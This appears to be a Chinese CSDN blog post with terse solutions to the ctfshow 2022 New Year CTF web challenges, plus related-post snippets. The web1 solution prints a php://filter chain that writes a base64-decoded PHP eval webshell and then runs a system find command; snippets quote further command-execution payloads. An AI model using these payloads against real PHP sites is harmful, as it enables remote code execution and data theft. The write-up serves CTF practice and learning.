ctfshow_新春欢乐赛2022

已于 2022-02-06 11:06:27 修改
阅读量960 收藏 1
点赞数 1
分类专栏: CTF 笔记 文章标签: php
于 2022-02-03 16:46:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/122776783
版权
CTF 同时被 2 个专栏收录
38 篇文章 1 订阅
订阅专栏
笔记
18 篇文章 1 订阅
订阅专栏

不泄露wp每晚9点更新

热身

?f=phpinfo();

在里面找到secret文件,里面有flag

web1

?content=php://filter/<?|string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B/../3.php

PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B  ----->
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+    ----->
<?php eval($_POST[1]);?>

1=system("find / -name fl*");
在/flag.txt

web2

Post
session_id=session_id
Cookie
PHPSESSID=HappyNewYear

web3

?1=error_reporting

web4

?1=spl_autoload_extensions

web5

很多个hu使其溢出
我用hackbar不行
看群主用burp suite
有点气呜呜呜

专注pwn0年
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow _新春欢乐
as you know, nlp is fantasitc!
02-08 3857
ctfshow _新春欢乐 写在前面:这样每天一道题目,深入学习一个知识点,对于语言的理解会更加清晰,也通过这几天的做题学到很多东西,这里总结下做题过程,下次遇到相同问题能够避免 热身 这个题开始做的很艰难,有两个地方不熟悉,一个eval的代码执行是一条语句,后面要加;另一个是找flag,做题做得少,不知道怎么找 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可 web1 死亡exit的绕过 知识点:死亡exit的绕过(分为三种情况) 开始做这题,不知道这个点,没
ctfshow 新春欢乐
qq_37561898的博客
02-02 3046
ctfshow 新春欢乐
CTFshow---新春欢乐
unexpectedthing的博客
02-11 1188
新春欢乐热身web1web2web3web4web5web6web7 热身 直接执行phpinfo(),有回显 开始准备找flag,但是没找到 看到了auto_prepend_file,有文件目录 直接读取 f=system(“nl /etc/ssh/secret/youneverknow/secret.php”); web1 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last
ctfshow 新年欢乐WP
博客地址 www.sec0nd.top
02-21 538
文章目录热身方法一方法二web1web2web3web4 热身 <?php eval($_GET['f']); 方法一 打开之后先查看phpinfo() 直接可以代码执行,从phpinfo里面找到flag的位置(自动包含的文件) 输出即可得flag 方法二 第二种思路是,查看当前页面得变量,直接出flag ?f=print_r(get_defined_vars()); web1 <?php highlight_file(__FILE__); error_reporting(0);
CTFshow新春欢乐--web6--反序列化字符串逃逸
unexpectedthing的博客
02-09 1847
web6 考点:反序列化数组+字符串逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
2022年迎新春flash动画
07-24
2022年迎新春Flash动画是利用Adobe Flash软件创作的一种多媒体内容,旨在为新年庆祝活动增添欢乐气氛。它可能包含了动态的图像、文字、声音以及交互元素,让人们能够在线分享喜悦,把快乐传递给亲友。 "flash8521....
记者向家乡新春贺电_新春贺电
08-19
【标题】:“记者向家乡新春贺电_新春贺电”实际上并不是一个与IT行业直接相关的主题,它更多属于新闻报道或者人文关怀的范畴。然而,我们可以从中探讨一下信息传播技术在现代社会中的应用,以及它如何影响了人们在...
20210103 BDFZ新春公开.pdf
06-27
c++竞学习者
2022年恭贺新春喜庆模板.pdf
12-31
2022年恭贺新春喜庆模板.pdf
2022地产项目虎年新春文化节“虎力全开”活动策划方案.pptx
04-21
2022地产项目虎年新春文化节“虎力全开”活动策划方案.pptx
ctfshow 新春迎新 热身和web1
akxnxbshai的博客
02-07 902
一不小心在ctfshow上看了新春迎新,也就尝试做了一下,也算是检验自己这段时间以来的成果吧! 热身 看到代码本能感觉挺简单的,就一个eval函数,于是我便直接传入了system(‘ls’); 没发现flag,于是又查看。 想着用通配符 发现没用,又用了?也没用。 所以想到了另一种无参rce。 首先查看了当前页面的变量,直接发现了flag,也算是误打误撞。 Payload:?f= print_r(get_defined_vars()); web1 刚开始看到这
ctfshow 新春迎新 web2、web3
akxnxbshai的博客
02-09 503
Web2 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @Last Modified by: h1xa # @Last Modified time: 2022-01-24 22:14:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ highlight_file(__FILE__); session_star
[ctfshow]2022 新春欢乐 wp
cosmoslin的博客
02-09 1400
热身 开局看到源码,但是却没有显示源码的代码。那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag。 ?f=system("tac etc/ssh/secret/youneverknow/secret.php"); web1 highlight_file(__FILE__); error_reporting(0); $content = $_GET[content]; file_put_contents($content,'<?php exit();'
ctfshow 群友挑战 CTFshow福利抽奖
ScyLamb的博客
03-05 1042
打开即可看见flag【域名后面不能有路径,如https://www.baidu.com/】 然后去提交flag,可以清楚的发现没有提交flag的框**!!!** 然后,憨憨的我跑去环境中找,看看有没有后台啥的 再然后,我发现我是憨憨,没有提交框就自己写个呗。。。 如下,简简单单的Python脚本: import requests url='https://ctf.show/api/v1/challenges/attempt' data='{"challenge_id":"1089","submissi.
CTFSHOW周末大挑战wp
arcuied
05-14 78
CTFSHOW周末大挑战wp
CTFshow web5 解题思路
asdfghjklqwwe的博客
05-18 511
开始将代码誊到visicode,进行审计 审计结果: 一共分为四个if,满足四个条件就出现flag 第一个if的意思;判断两个值是否为空值,是空值就报错 第二个:顾名思义,如果v1不是纯字符就输出'v1 error'所以要让v1成为纯字符 第三个:如果v2 不是纯数字就返回'v2 error'是纯数字就返回TRUE 第四个:要使它们MD5(哈希)值相同返回flag 看完四个意思就可以解出来了 前三个不难,问题是将MD5值相同这里我们在下面寻找 可以经过观察只有1,2是纯数...
CTF.show:新春红包题wp
qq_46230755的博客
02-18 2722
这次ctfshow的新春,一共八题,领到了六题的红包,第八题是我出的,然后除了狸题最后都有做出来。菜鸡一个罢了,简单写的wp师傅们蛮看看点点关注。然后感谢做题过程中大师傅们的帮助,就不一一点名了,都是大师傅带的好我才做的出来的。 文章目录除夕:属于大牛的压缩包初一:爆竹声声初二:先天八卦操初三(情人节):阴阳人初四:长虫初五:新年好?初六:牛年大吉2.0初七:古代非对称密码 除夕:属于大牛的压缩包 题目打开,修改文件名后缀为zip,打开后发现存在25个图片,复制25份,每份留下一份图片,对压缩包密码.
MOCTF新春欢乐-逆向writeup
杀生丸?不,其实我要的是桔梗
02-15 956
1.easyre(50) &lt;给入门小伙子看的哈&gt; 这是一个linux的运行文件。 IDA打开: 知道关键代码在getflag函数。 双击进入getflag IDA会把字符串转为16进制。 现在你需要将这些转回来。对着16进制按R 现在代码的思路就很清楚了。 创建一个字符串=“}moctf” strcat拼接acc,add,‘-’,abb 最后加上‘}’...
python烟花新春盛宴
最新发布
02-09
Python烟花新春盛宴是一个由CSDN开发的Python编程活动,旨在庆祝中国传统新年。这个活动提供了一系列有趣的Python编程挑战和项目,让开发者们可以展示他们的编程技能和创造力。 在Python烟花新春盛宴中,你可以参与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值